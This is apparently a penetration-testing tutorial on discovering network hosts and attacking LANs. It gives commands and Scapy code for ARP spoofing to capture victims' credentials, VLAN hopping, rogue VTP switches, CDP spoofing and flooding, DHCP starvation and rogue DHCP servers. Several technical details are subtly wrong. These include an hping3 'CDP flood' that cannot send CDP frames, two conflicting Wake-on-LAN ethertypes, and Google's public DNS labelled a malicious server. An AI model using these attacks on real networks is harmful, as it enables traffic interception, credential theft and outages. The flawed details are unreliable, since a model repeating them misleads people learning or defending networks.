Discovering hosts from outsideICMP (Internet Control Message Protocol)

ICMP (Internet Control Message Protocol) is widely used for diagnostic and error-reporting purposes in networking. The most common ICMP message used to check if a host is up is the "Echo Request" message, commonly known as a "ping."

Here's a step-by-step guide on how to use ICMP to check if a host is up, along with examples:

Using the ping Command

Windows

• Open Command Prompt (CMD).
• Type the following command and press Enter:

ping google.com

This will send ICMP Echo Request packets to the specified host and display the responses.

example output

Pinging google.com [142.250.64.78] with 32 bytes of data:
Reply from 142.250.64.78: bytes=32 time=12ms TTL=115
Reply from 142.250.64.78: bytes=32 time=13ms TTL=115
Reply from 142.250.64.78: bytes=32 time=12ms TTL=115
Reply from 142.250.64.78: bytes=32 time=12ms TTL=115

Ping statistics for 142.250.64.78:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 12ms, Maximum = 13ms, Average = 12ms

If you need to automate the process or integrate it into a program, you can use Python with the subprocess module or the ping3 library.

Using subprocess Module

import subprocess
def ping(host):
    # Use '-n' on Windows and '-c' on Linux/macOS to specify the number of packets
    param = '-n' if subprocess.run("uname", capture_output=True).returncode != 0 else '-c'
    command = ['ping', param, '1', host]
    return subprocess.run(command, capture_output=True).returncode == 0
host = 'google.com'
if ping(host):
    print(f"{host} is up")
else:
    print(f"{host} is down")

Firewall Restrictions: Some networks or hosts may block ICMP Echo Requests, making it appear as if the host is down when it's actually not. Always consider firewall and security settings.

TCP Port Discovery

To determine if a host is up or not from outside, you can use TCP port discovery methods. These methods involve sending TCP packets to specific ports on the target host and observing the responses. Common tools for this purpose include nmap, nc (netcat), and telnet. Below are examples of how to use these tools:

Using nmap

nmap (Network Mapper) is a powerful tool for network discovery and security auditing. To check if a host is up, you can use the following command:

nmap -p 80 example.com

This command checks if port 80 (HTTP) on the host example.com is open. If the port is open, it indicates that the host is likely up. You can specify multiple ports or a range of ports as well:

nmap -p 22,80,443 example.com

For a more detailed scan that includes host discovery and service detection:

nmap -Pn -sV example.com

Using nc (netcat)

nc (netcat) is a simple utility that can read and write data across network connections using TCP or UDP. To check if a host is up by connecting to a specific port:

nc -zv example.com 80

Script Example Using Python

You can also use Python to create a simple script to check if a host is up by connecting to a specific port:

import socket

def is_host_up(host, port):
    try:
        with socket.create_connection((host, port), timeout=3):
            return True
    except (socket.timeout, socket.error):
        return False

host = 'example.com'
port = 80

if is_host_up(host, port):
    print(f"{host} is up on port {port}.")
else:
    print(f"{host} is down or port {port} is closed.")

HTTP port discovery

HTTP Port Discovery is a technique to determine whether a host is up by checking for the availability of certain ports (usually those associated with HTTP services like port 80 for HTTP and port 443 for HTTPS). Tools like naabu, a fast port scanning tool, can be used to perform this discovery. naabu is designed to scan for open ports on a host, and can be combined with other tools to further investigate the presence of HTTP services.

Scanning Multiple Hosts: You can also scan multiple hosts by providing a file with a list of hosts:

naabu -iL hosts.txt -p 80,443

Combining naabu with Other Tools: To get more information about the HTTP service running on the discovered ports, you can pipe the results to another tool like httpx which probes the HTTP services.

naabu -host example.com -p 80,443 -o naabu-output.txt
cat naabu-output.txt | httpx -silent

UDP port Discovery

UDP Port Discovery can be used to determine if a host is up by sending UDP packets to specific ports and observing the responses. Unlike TCP, UDP is connectionless, so the response behavior is different. Here are some steps and examples of how you can use UDP Port Discovery to check if a host is up:

• Identify UDP Ports to Probe: Choose commonly open UDP ports for the service you expect the host to run. Common UDP ports include DNS (53), NTP (123), SNMP (161), etc.
• Send UDP Packet : Use a tool like nmap, netcat (nc), or a custom script to send a UDP packet to the chosen port on the target host.
• Analyze the Response:
• No Response: If there is no response, it does not necessarily mean the host is down. The UDP packet may have been dropped by a firewall.
• ICMP Port Unreachable: If you receive an ICMP "Port Unreachable" message, it typically means the host is up but the specific UDP port is closed.
• Response from Service: If you receive a valid response from the service running on the UDP port, the host is up.

Example Using nmap

nmap -sU -p 53 192.168.1.10

• -p 53: Scans port 53 (DNS).
• 192.168.1.10: Target IP address.
• -sU: Specifies a UDP scan.

output

Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-28 12:00 UTC
Nmap scan report for 192.168.1.10
Host is up (0.0015s latency).
PORT   STATE         SERVICE
53/udp open|filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

Example using netcat

echo "hello" | nc -u -w1 192.168.1.10 123

Example Custom Python Script

You can also create a custom script in Python using the socket module to send UDP packets.

import socket
import time

def is_host_up(ip, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(2)
        sock.sendto(b"hello", (ip, port))
        data, addr = sock.recvfrom(1024)
        return True
    except socket.timeout:
        return False
    except Exception as e:
        print(f"Error: {e}")
        return False
    finally:
        sock.close()

# Test the function
ip = '192.168.1.10'
port = 123
if is_host_up(ip, port):
    print(f"Host {ip} is up on port {port}")
else:
    print(f"Host {ip} is down or not responding on port {port}")

Discovering Hosts from inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Active Methods

Active methods involve actively sending packets into the network to solicit responses from other devices. These methods can be more thorough but also more noticeable on the network.Ping sweep, also known as ICMP sweep, is an active method of host discovery used in network scanning. The purpose of a ping sweep is to identify which IP addresses in a range are active and responsive. This technique is widely used by network administrators for network inventory and by security professionals for identifying live hosts in a network.

Ping Sweep

Ping sweep, also known as ICMP sweep, is an active method of host discovery used in network scanning. The purpose of a ping sweep is to identify which IP addresses in a range are active and responsive.

• Sending ICMP Echo Requests: The tool or script sends ICMP Echo Request (ping) packets to a range of IP addresses.
• Receiving ICMP Echo Replies: Active hosts respond with ICMP Echo Reply packets.
• Analyzing Responses: The tool collects the responses and lists the IP addresses that are active.

Using nmap for Ping Sweep

nmap is a powerful network scanning tool that can perform a ping sweep among many other functions. Here’s an example of using nmap to perform a ping sweep

nmap -sn 192.168.1.0/24

ARP Scan

ARP (Address Resolution Protocol) scanning is an active method used to discover hosts within a local network. It works by sending ARP requests to all possible IP addresses within a specified range and listening for responses

ARP Request: The ARP scanner sends out ARP requests for each IP address within the specified range. For example, it sends an ARP request for 192.168.1.1, then 192.168.1.2, and so on, up to 192.168.1.254.

• Response: If a host with the corresponding IP address is active on the network, it will respond to the ARP request with its MAC address.

• Host Discovery: The scanner records the IP address and MAC address of each responding host. This information is used to build a list of active hosts on the network.

• Completion: Once all IP addresses within the specified range have been scanned, the ARP scanning process is complete.

Here's an example of how you might use the arp-scan tool in Linux to perform an ARP scan:

arp-scan 192.168.1.0/24

Active ICMP

Note that the techniques commented in Discovering hosts from the outside (ICMP) can be also applied here. But, as you are in the same network as the other hosts, you can do more things:

• If you ping a subnet broadcast address the ping should be arrive to each host and they could respond to you: ping -b 10.10.5.255

• Pinging the network broadcast address you could even find hosts inside other subnets: ping -b 255.255.255.255

• Use the -PE, -PP, -PM flags of nmapto perform host discovery sending respectively ICMPv4 echo, timestamp, and subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan is used to turn on computers through a network message. The magic packet used to turn on the computer is only a packet where a MAC Dst is provided and then it is repeated 16 times inside the same paket. Then this kind of packets are usually sent in an ethernet 0x0842 or in a UDP packet to port 9. If no [MAC] is provided, the packet is sent to broadcast ethernet (and the broadcast MAC will be the one being repeated).

Copy # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain) wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847 wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Network Mapper (nmap)

Host discovery in Nmap involves identifying which hosts are active on a network, meaning they are reachable and responsive. This is crucial for network administrators to understand the topology of their network and identify potential security issuesHere's an example of how to perform host discovery using Nmap with the ICMP echo request method:

nmap -sn <target>

For example, if you want to scan a single host with the IP address 192.168.1.100, the command would be:

nmap -sn 192.168.1.100

This command will send ICMP echo requests (commonly known as pings) to the specified IP address(es) and report back which hosts responded, indicating they are active on the network.

Netdiscover

Netdiscover is a network reconnaissance tool primarily used for active host discovery. It is particularly useful in local networks to identify active devices by sending ARP (Address Resolution Protocol) requests and listening for ARP replies.The active method involves actively sending ARP requests to the network and waiting for ARP replies.

You can specify a particular range of IP addresses to scan. For example, to scan the 192.168.1.0/24 subnet:

sudo apt-get install netdiscover
sudo netdiscover
sudo netdiscover -r 192.168.1.0/24

Sample output

Currently scanning: 192.168.1.0/24   |   Screen View: Unique Hosts

6 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 360
_____________________________________________________________________________
 IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1    00:14:22:01:23:45      1      60  Netgear
192.168.1.10   00:0c:29:68:8b:72      1      60  VMware, Inc.
192.168.1.15   08:00:27:88:9b:bc      1      60  PCS Systemtechnik GmbH
192.168.1.20   00:50:56:c0:00:01      1      60  VMware, Inc.
192.168.1.30   00:1c:c4:02:77:5e      1      60  TP-LINK Technologies Co., Ltd.
192.168.1.100  74:e5:43:a7:65:b0      1      60  Samsung Electronics Co., Ltd

SNMP Scan

The active method of host discovery using SNMP (Simple Network Management Protocol) Scan involves actively querying devices on a network to determine their presence and gather information about them.

Description of SNMP Scan for Host Discovery

SNMP Basics:

• SNMP is a protocol used for network management, allowing devices on a network (such as routers, switches, servers, and printers) to communicate with a network management system (NMS).

• SNMP operates using a manager-agent model. The SNMP manager queries agents (devices) using a set of predefined messages (GET, GET-NEXT, SET, etc.).

Active Scanning Process:

• Discovery Request: The SNMP manager sends out SNMP requests (typically SNMP GET or GET-NEXT requests) to a range of IP addresses.

• Agent Response: Devices that support SNMP and are within the specified IP range will respond with the requested information.

• Information Gathering: The SNMP manager collects data from the responses, such as device identifiers, IP addresses, system descriptions, and other management information.

OID (Object Identifier):

• SNMP uses OIDs to identify specific pieces of information on an SNMP-enabled device.

• Commonly used OIDs for discovery include 1.3.6.1.2.1.1.1 (system description) and 1.3.6.1.2.1.1.5 (system name).

Authentication:

• SNMPv1 and SNMPv2c use community strings for authentication (e.g., "public" for read-only access).
• SNMPv3 provides enhanced security features, including authentication and encryption.

Example of SNMP Scan for Host Discovery

Step-by-Step Process:

1. Configure the SNMP Manager:

• Define the IP address range to scan (e.g., 192.168.1.0/24).

• Set the community string (e.g., "public").

• Choose the OID to query (e.g., 1.3.6.1.2.1.1.1 for system description).

Send SNMP Requests:

• The SNMP manager sends SNMP GET requests to each IP address in the range, querying the chosen OID.

Receive Responses:

• Devices that support SNMP and are up will respond with the requested information.
• The manager records the responses and gathers data such as device IP, system description, and status.

Analyze and Report:

• The collected data is analyzed to determine the list of active hosts and their details.

Example using snmpwalk Command-Line Tool

snmpwalk is a popular tool used for querying SNMP-enabled devices.

snmpwalk -v2c -c public 192.168.1.0/24 1.3.6.1.2.1.1.1

• -v2c: Specifies SNMP version 2c.
• -c public: Specifies the community string ("public").
• 192.168.1.0/24: Specifies the IP address range to scan.
• 1.3.6.1.2.1.1.1: The OID for system description.
• snmpwalk: The tool used for SNMP queries.

SNMPv2-MIB::sysDescr.0 = STRING: Linux server1.example.com 3.10.0-957.el7.x86_64 #1 SMP Wed Nov 21 18:51:08 UTC 2018 x86_64
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, C3750E Software (C3750E-UNIVERSALK9-M), Version 12.2(55)SE4, RELEASE SOFTWARE (fc1)

Passive Methods

Passive methods involve listening to network traffic without actively sending probes. These methods are stealthier but may not provide as comprehensive information as active methods.

Network Sniffing with Wireshark

Wireshark can capture and analyze packets on the network to identify active devices and their communications.

• Start Wireshark and select the network interface to listen on.

• Apply a display filter to focus on traffic of interest (e.g., arp, dhcp, or general ip traffic).

Monitor the captured packets to identify active devices.

example

arp or dhcp or icmp

Pssive OS fingerpriniting with pOf

Passive OS Fingerprinting with p0f (passive operating system fingerprinting) is a method used to identify the operating systems of network devices without actively probing or scanning them. Instead, it analyzes the characteristics of the network traffic that devices generate naturally.

Launch p0f to monitor a specific network interface (e.g., eth0).

sudo p0f -i eth0

p0f will start passively capturing and analyzing traffic. As it captures packets, it will attempt to identify the OS of the devices communicating over the network. The output will display information about the detected hosts, such as IP address, detected OS, and other network attributes.

LAN Attacks

APR Spoofing

ARP is used to map the IP addresses to MAC addresses. Devices broadcast ARP requests asking, "Who has this IP address?" and the device with the corresponding IP address responds with its MAC address. This information is stored in the ARP cache for a short duration to avoid repeated ARP requests.

Why ARP Spoofing is Possible

The ARP protocol lacks authentication. Devices accept ARP responses without verifying if they actually requested it. This vulnerability allows attackers to send malicious ARP responses, poisoning the ARP cache of other devices.

ARP Spoofing with arpspoof - A Practical Example

Let's demonstrate an ARP spoofing attack using the arpspoof utility, which is part of the dsniff package. We assume the following network configuration:

• Attacker's machine: 192.168.1.100

• Victim's machine: 192.168.1.101

• Router (default gateway): 192.168.1.1

Step-by-Step Attack

• Install dsniff package: First, ensure that the dsniff package is installed on the attacker's machine. sudo apt install dsniff
• Enable IP Forwarding: The attacker needs to forward packets between the victim and the router. This is done by enabling IP forwarding. echo 1 > /proc/sys/net/ipv4/ip_forward
• Run arpspoof to poison the ARP cache of the victim and the router: Execute the following commands to start the ARP spoofing attack. The first command tells the victim that the attacker is the router, and the second tells the router that the attacker is the victim.

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1 arpspoof -i eth0 -t 192.168.1.1 192.168.1.101

• Capture the Intercepted Traffic: Use a tool like tcpdump or Wireshark to capture and analyze the network traffic being forwarded through the attacker’s machine.

tcpdump -i eth0

Detailed Attack Flow

• 1 . Initiate ARP Spoofing: The attacker’s machine sends ARP responses to both the victim and the router. These responses falsely claim that the attacker’s MAC address is associated with the IP addresses of the router and the victim, respectively.

For example, the attacker sends:

• To the victim: "192.168.1.1 is at [attacker's MAC]"

• To the router: "192.168.1.101 is at [attacker's MAC]"

• 2. ARP Cache Poisoning: Both the victim and the router update their ARP caches with the attacker’s MAC address for the respective IP addresses. As a result, the victim now believes the attacker is the router, and the router believes the attacker is the victim.
• 3. Intercept and Forward Traffic: All traffic between the victim and the router is now routed through the attacker’s machine. The attacker can monitor, capture, and even modify the data before forwarding it to the intended recipient. This can include sensitive information such as login credentials, personal data, etc.
• 4. Example Scenario: Suppose the victim attempts to log into an unencrypted web application. The victim’s credentials (username and password) are sent over HTTP. The attacker captures this HTTP request using tcpdump or Wireshark and extracts the credentials.

Capturing Login Credentials:

tcpdump -i eth0 -w capture.pcap

Open the capture.pcap file in Wireshark, and filter for HTTP requests. Look for POST requests to identify the login credentials being transmitted.

VLAN Hopping

Virtual LANs (VLANs) are used to segment network traffic to improve performance and security. However, VLANs can be exploited by attackers using a technique known as VLAN hopping. This technique allows attackers to send packets to different VLANs, bypassing the segmentation that VLANs are intended to provide.

How VLAN Hopping Works

VLAN hopping can be executed in two primary ways:

• Switch Spoofing: The attacker configures their device to act as a switch, negotiating a trunk link with the switch to gain access to all VLANs.

• Double Tagging: The attacker sends frames with two VLAN tags. The first tag is stripped by the first switch, and the second tag is interpreted by the second switch, allowing the frame to be forwarded to a different VLAN.

VLAN Hopping via Double Tagging

Let's delve into the double tagging attack, which is more commonly used due to its simplicity and effectiveness.

Network Setup

Consider a network with the following VLAN configuration:

• VLAN 10: User VLAN

• VLAN 20: Server VLAN

Attack Scenario

• Attacker's Preparation: The attacker connects to a port on VLAN 10 but wants to send traffic to VLAN 20.

• Crafting the Packet: The attacker crafts a packet with two VLAN tags: - Outer Tag: VLAN 10 (the VLAN the attacker is connected to) - Inner Tag: VLAN 20 (the target VLAN)

This can be done using various packet crafting tools such as Scapy in Python:

from scapy.all import * 
packet = Ether()/Dot1Q(vlan=10)/Dot1Q(vlan=20)/IP(dst="192.168.20.10")/ICMP() sendp(packet, iface="eth0")

• Sending the Packet: The attacker sends the crafted packet into the network.

• Switch Processing: - The first switch receives the packet and strips the outer VLAN tag (VLAN 10), forwarding the packet based on the inner tag (VLAN 20). - The second switch receives the packet with VLAN 20 tag and forwards it to the appropriate port(s) on VLAN 20.

• Packet Reaches the Target VLAN: The packet now reaches the target VLAN (VLAN 20) without the attacker directly having access to that VLAN

Practical Demonstration

Let's walk through a practical example using a network setup with Cisco switches.

• Network Configuration:

Switch 1: - Port 1: Trunk (allows VLAN 10 and VLAN 20) - Port 2: Access VLAN 10 (attacker's port) Switch 2: - Port 1: Trunk (allows VLAN 10 and VLAN 20) - Port 2: Access VLAN 20 (target server's port)

• Attacker's Steps:

  • Connect to port 2 on Switch 1 (VLAN 10).
  • Craft and send a double-tagged packet from their device.

• Packet Flow:

  • The packet enters Switch 1 with tags VLAN 10 (outer) and VLAN 20 (inner).
  • Switch 1 strips the VLAN 10 tag and forwards the packet with VLAN 20 tag to Switch 2.
  • Switch 2 receives the packet with VLAN 20 tag and forwards it to the target server on VLAN 20.

Layer 3 Private VLAN Bypass

Layer 3 Private VLAN Bypass is a technique used to communicate between isolated hosts within the same primary VLAN, bypassing the segmentation imposed by private VLANs (PVLANs).

Understanding Private VLANs

• Primary VLAN: The main VLAN that includes all associated secondary VLANs.
• Secondary VLANs: Can be either isolated (no direct communication between hosts) or community (hosts can communicate with each other but not with isolated VLANs).

Bypass Mechanism

An attacker can exploit Layer 3 mechanisms (like routing or proxy ARP) to bypass the isolation of private VLANs and communicate with other hosts within the primary VLAN.

Example Scenario

• Primary VLAN: VLAN 100
• Isolated VLAN: VLAN 101 (Host A)
• Isolated VLAN: VLAN 102 (Host B)

Even though Host A and Host B are in isolated VLANs (101 and 102), they should not communicate directly. However, the attacker can use a router or Layer 3 device within VLAN 100 to facilitate communication.

• Using Proxy ARP:

  • The attacker configures a device to respond to ARP requests on behalf of hosts in VLAN 101 and VLAN 102.
  • Host A sends an ARP request for Host B’s IP address.
  • The attacker’s device (configured with proxy ARP) responds with its own MAC address.
  • Host A sends the packet to the attacker’s device, which then forwards it to Host B.

• Using Routing: - The attacker configures a router within the primary VLAN (VLAN 100) to route traffic between VLAN 101 and VLAN 102. - Host A sends a packet to the router with the destination IP of Host B. - The router, knowing the routes for both isolated VLANs, forwards the packet from VLAN 101 to VLAN 102.

Practical Execution

• Network Setup: Ensure a router or Layer 3 switch is configured to handle traffic between the isolated VLANs.

• Proxy ARP Configuration:

plaintextCopy codeinterface vlan101 ip address 192.168.101.1 255.255.255.0 ip proxy-arp interface vlan102 ip address 192.168.102.1 255.255.255.0 ip proxy-arp

• Routing Configuration: plaintextCopy codeip route 192.168.101.0 255.255.255.0 vlan101 ip route 192.168.102.0 255.255.255.0 vlan102

In both cases, the attacker successfully facilitates communication between isolated VLANs, bypassing the intended security measures.

VLAN Trunking Protocol (VTP) Attacks

Understanding VLAN Trunking Protocol (VTP) Attacks

VLAN Trunking Protocol (VTP) is a Cisco-proprietary protocol used to manage VLAN configurations across a network of switches. VTP helps network administrators ensure consistency of VLAN configurations across all switches in a VTP domain by propagating VLAN information. However, VTP can be exploited by attackers to disrupt network operations or gain unauthorized access to network segments. Below, we explore the types of VTP attacks, how they are executed, and provide examples.

Types of VTP Attacks

• VTP Version Spoofing
• VTP Domain Hijacking
• VTP Subversion

1. VTP Version Spoofing

VTP version spoofing involves an attacker sending VTP advertisements with a higher version number than the one currently in use in the network. Cisco switches prioritize higher VTP versions, so if an attacker introduces a higher version, it can take precedence over the legitimate VTP version and propagate malicious VLAN information.

Example: Suppose the network is using VTP version 2, and an attacker introduces a switch with VTP version 3. The legitimate switches will recognize version 3 as superior and may start accepting VTP updates from the rogue switch, potentially causing VLAN mismatches and network segmentation issues.

Example: An attacker sets a rogue switch to VTP version 3 to spoof the network's legitimate VTP version.

Command on Attacker's Switch:

Switch(config)# vtp version 3

2. VTP Domain Hijacking

VTP domain hijacking occurs when an attacker introduces a switch into the network with a higher VTP revision number. VTP relies on revision numbers to determine the most recent and therefore the valid VLAN configuration. A switch with a higher revision number can overwrite the VLAN configurations on all other switches in the VTP domain.

Example: An attacker connects a rogue switch to the network with a higher VTP revision number and a different set of VLANs. This rogue switch sends VTP advertisements that are accepted by legitimate switches, causing them to overwrite their VLAN databases. As a result, network traffic can be disrupted, and devices may become unable to communicate.

An attacker connects a rogue switch with a higher VTP revision number.

Command on Attacker's Switch:

Switch(config)# vtp domain attackdomain 
Switch(config)# vtp mode server 
Switch(config)# vtp version 2 
Switch(config)# vtp password attackpass 
Switch(config)# vtp revision <higher-revision-number>

3. VTP Subversion

Description: VTP subversion involves an attacker exploiting the VTP protocol to insert a rogue switch with malicious configurations into the network. This attack can lead to VLAN hopping or unauthorized access to VLANs.

Example: An attacker could connect a switch configured to advertise a large number of non-existent VLANs, consuming VLAN IDs and causing network administrators to run out of available VLANs for legitimate use. Alternatively, the attacker could create a rogue switch with VLANs that facilitate unauthorized access to restricted segments of the network.

Example: An attacker advertises a large number of non-existent VLANs.

Command on Attacker's Switch:

Switch(config)# vtp domain attackdomain 
Switch(config)# vtp mode server 
Switch(config)# vtp version 2 
Switch(config)# vtp password attackpass 
Switch(config)# vlan 1000 
Switch(config-vlan)# name maliciousVLAN1000 # Repeat for as many VLANs as desired

CDP Attacks: An Overview

The Cisco Discovery Protocol (CDP) is a proprietary Data Link Layer protocol developed by Cisco Systems. It is used primarily for network management and discovery by allowing network devices to exchange information about themselves. While CDP is useful for network administrators to understand the topology and capabilities of their network, it also introduces certain security risks if exploited by malicious actors.

Types of CDP Attacks

1. CDP Reconnaissance Attack

• Description: In this type of attack, an attacker listens to CDP packets on the network to gather detailed information about network devices. This information can include device type, IP address, software version, capabilities, and more. Such data can be valuable for planning further attacks, such as targeted exploits or network mapping.

• Example: An attacker connects a device to a network switch and captures CDP packets using a network monitoring tool like Wireshark. By analyzing these packets, the attacker can build a map of the network and identify high-value targets such as routers or core switches.CDP Reconnaissance with Wireshark

CDP Reconnaissance with Wireshark

1. Start Wireshark on a device connected to the network.
2. Apply a display filter for CDP packets: `cdp`.
3. Analyze the captured CDP packets to extract information such as:
   - Device ID
   - IP address
   - Software version
   - Platform and capabilities
4. Use this information to map the network and identify potential targets for further exploitation.

2. CDP Spoofing Attack

• Description: In a CDP spoofing attack, the attacker sends forged CDP packets to manipulate the network's perception of a device. This can lead to misconfigurations, redirection of traffic, or disruption of network services.

• Example: An attacker crafts a CDP packet claiming to be from a network switch with higher priority, causing neighboring devices to reconfigure their settings based on the spoofed information. This can lead to traffic being routed incorrectly, resulting in a denial of service or data interception.

CDP Spoofing with Scapy (Python)

from scapy.all import *

# Create a CDP packet
cdp_packet = (
    Ether(dst="01:00:0c:cc:cc:cc", src="00:11:22:33:44:55") /
    LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
    SNAP(OUI=0x00000c, code=0x2000) /
    CDPMsgDeviceID(val="FakeSwitch") /
    CDPMsgPortID(iface="GigabitEthernet0/1") /
    CDPMsgSoftwareVersion(val="Fake IOS") /
    CDPMsgPlatform(val="Fake Platform")
)

# Send the packet
sendp(cdp_packet, iface="eth0")

3. CDP Flood Attack

• Description: This attack involves flooding the network with an excessive number of CDP packets. The goal is to overwhelm network devices, causing high CPU utilization, network congestion, or even device crashes.

• Example: An attacker sets up a script to send thousands of CDP packets per second. Network devices, especially those with limited processing power, may become overwhelmed and unable to handle legitimate network traffic, leading to degraded performance or outages.

CDP Flooding with hping3

1. Install hping3: `sudo apt-get install hping3`
2. Run the following command to flood the network with CDP packets:
   `sudo hping3 -1 --destport 2063 --flood -C 0xAA -H 0xAA 192.168.1.255`
3. Monitor the network for performance issues or crashes on network devices.

VoIP Attacks and the VoIP Hopper Tool

VoIP Attacks

Voice over Internet Protocol (VoIP) is a technology that allows voice communications to be carried over Internet Protocol (IP) networks, such as the internet. While VoIP offers numerous benefits, including cost savings and flexibility, it also presents unique security challenges. Common VoIP attacks include:

• Eavesdropping: Intercepting VoIP calls to listen to the conversation.
• Denial of Service (DoS): Overloading the VoIP network to disrupt services.
• Caller ID Spoofing: Manipulating the caller ID to impersonate someone else.

VoIP Hopper Tool

VoIP Hopper is a security tool designed to assess the security of VoIP networks by simulating an attacker's perspective. It allows network administrators and security professionals to test their VoIP infrastructure for vulnerabilities and ensure that security measures are effective. VoIP Hopper primarily focuses on VLAN hopping, which involves bypassing network segmentation to access voice VLANs.

VLAN Hopping Simulation:

To simulate VLAN hopping, specify the interface and target VLAN.

sudo voiphopper -i eth0 -v 10

CDP Sniffing Mode: This mode allows VoIP Hopper to passively listen to CDP packets on the network without generating any traffic. It helps in gathering information about neighboring Cisco devices.

voiphopper -i eth0 -m cdp_sniff

CDP Spoofing Mode: In this mode, VoIP Hopper can impersonate a Cisco device by sending forged CDP packets. This can be useful for launching attacks or manipulating network topology.

voiphopper -i eth0 -m cdp_spoof -t 00:11:22:33:44:55 -n 192.168.1.1

In this example, VoIP Hopper spoofs a CDP packet with the MAC address 00:11:22:33:44:55 and IP address 192.168.1.1.

CDP Flooding Mode: This mode floods the network with CDP packets, which can overwhelm the CDP process on neighboring Cisco devices or saturate the network with unnecessary traffic.

voiphopper -i eth0 -m cdp_flood

This command floods the network on interface eth0 with CDP packets.

DHCP attacks

Dynamic Host Configuration Protocol (DHCP) is a network management protocol used to dynamically assign IP addresses to devices on a network. While DHCP simplifies network management, it also introduces vulnerabilities that can be exploited by attackers. Understanding these attacks and their mechanisms is crucial for network security professionals.

Types of DHCP Attacks

• 1. DHCP Starvation Attack

Objective: Exhaust the DHCP server's pool of IP addresses, preventing legitimate devices from obtaining an IP address.

Mechanism: The attacker floods the DHCP server with a large number of DHCP requests using spoofed MAC addresses. The server eventually runs out of IP addresses to assign.

Example: Using a tool like "dhcpstarv" or "Yersinia," an attacker can generate numerous DHCP requests with random MAC addresses.

DHCP Starvation Attack

Objective: Exhaust the DHCP server's pool of IP addresses, preventing legitimate devices from obtaining an IP address.

Mechanism: The attacker floods the DHCP server with a large number of DHCP requests using spoofed MAC addresses. The server eventually runs out of IP addresses to assign.

Example: Using a tool like "dhcpstarv" or "Yersinia," an attacker can generate numerous DHCP requests with random MAC addresses.

Initiate Yersinia:

• Open a terminal and start Yersinia in interactive mode: sudo yersinia -I

• Select the network interface to be used for the attack (usually eth0 or wlan0).

• Navigate to the DHCP attack options by selecting "DHCP" from the protocol list.

1. Launch DHCP Starvation Attack:

• In Yersinia, select the DHCP starvation attack option.

• Yersinia will start sending numerous DHCP request packets with random MAC addresses to the DHCP server.

sudo yersinia dhcp -attack 1

2. Rogue DHCP Server Attack

• Objective: Set up a malicious DHCP server on the network to issue IP addresses and network configuration information.

• Mechanism: The rogue server responds to DHCP requests from clients faster than the legitimate server, providing incorrect gateway, DNS server, or IP address information, potentially redirecting traffic or causing denial of service.

• Example: Using a tool like "Yersinia" or setting up a rogue DHCP server using software like "ISC DHCP Server" configured with malicious settings.

3. Configure Rogue DHCP Server:

• Edit the DHCP server configuration file /etc/dhcp/dhcpd.conf.

• Configure the subnet and IP range with malicious settings, for example, setting the default gateway and DNS server to the attacker's IP address.

subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.200; option routers 192.168.1.254; # Attacker's IP as gateway option domain-name-servers 8.8.8.8; # Malicious DNS server }

4. DHCP Spoofing Attack

• Objective: Intercept and alter DHCP messages between a legitimate DHCP server and a client.

• Mechanism: The attacker intercepts DHCP requests and responses, modifying them to redirect traffic or misconfigure the network settings of the clients.

• Example: Using a tool like "ettercap" to perform a man-in-the-middle attack, allowing the attacker to modify DHCP packets on the fly.

This batch script is used to configure a DHCP server on a Windows machine. Below is an explanation of each command in the script:

• 1. @echo off
  • This command turns off the display of the commands being executed in the command prompt window. It helps in keeping the output clean.
• 2. netsh dhcp server add scope 192.168.1.0 255.255.255.0 "Rogue Scope"
  • This command adds a new DHCP scope with the network address 192.168.1.0, subnet mask 255.255.255.0, and a name "Rogue Scope".
• 3. netsh dhcp server scope 192.168.1.0 set state 1
  • This command activates the newly created DHCP scope.
• 4. netsh dhcp server scope 192.168.1.0 add iprange 192.168.1.100 192.168.1.200
  • This command adds an IP address range from 192.168.1.100 to 192.168.1.200 to the DHCP scope. These are the IP addresses that can be leased to clients.
• 5. netsh dhcp server scope 192.168.1.0 set optionvalue 3 ipaddress 192.168.1.1
  • This command sets the default gateway for the DHCP clients to 192.168.1.1.
• 6. netsh dhcp server scope 192.168.1.0 set optionvalue 6 ipaddress 8.8.8.8 8.8.4.4
  • This command sets the DNS servers for the DHCP clients to Google's public DNS servers 8.8.8.8 and 8.8.4.4.
• 7. netsh dhcp server scope 192.168.1.0 set optionvalue 15 string "rogue.local"
  • This command sets the DNS domain name for the DHCP clients to "rogue.local".
• 8. netsh dhcp server set auditlogdirectory "C:\DHCP\AuditLog"
  • This command sets the directory where the DHCP server will store its audit logs to C:\DHCP\AuditLog
• 9. netsh dhcp server set bindings 1
  • This command binds the DHCP server to the network interface with the index 1.
• 10. sc start dhcpserver
  • This command starts the DHCP Server service.

The script essentially sets up a basic DHCP server with a specific scope, IP range, gateway, DNS servers, domain name, audit log directory, and starts the DHCP server service. Make sure to run this script with administrative privileges to ensure it can configure the network settings properly.

EAP attacks

Extensible Authentication Protocol (EAP) is a widely used authentication framework for wireless networks and point-to-point connections. While it is designed to provide a secure authentication mechanism, it is not immune to attacks. Below are some common EAP attacks and the techniques used to execute them:

1. EAP Relay Attack

Description: In an EAP relay attack, an attacker intercepts and relays authentication messages between a legitimate client and a legitimate authentication server. The attacker positions themselves in the communication path to relay messages without the knowledge of either party.

Techniques:

• Man-in-the-Middle (MitM): The attacker intercepts and relays the authentication traffic between the client and server, allowing them to gain unauthorized access or capture sensitive information.

• Impersonation: The attacker uses the intercepted messages to impersonate the legitimate client or server, potentially gaining access to protected resources.

2. EAP-TLS Downgrade Attack

Description: EAP-TLS is considered one of the most secure EAP methods due to its use of mutual authentication and encryption. However, attackers can attempt to downgrade the security level of the communication to exploit weaker EAP methods.

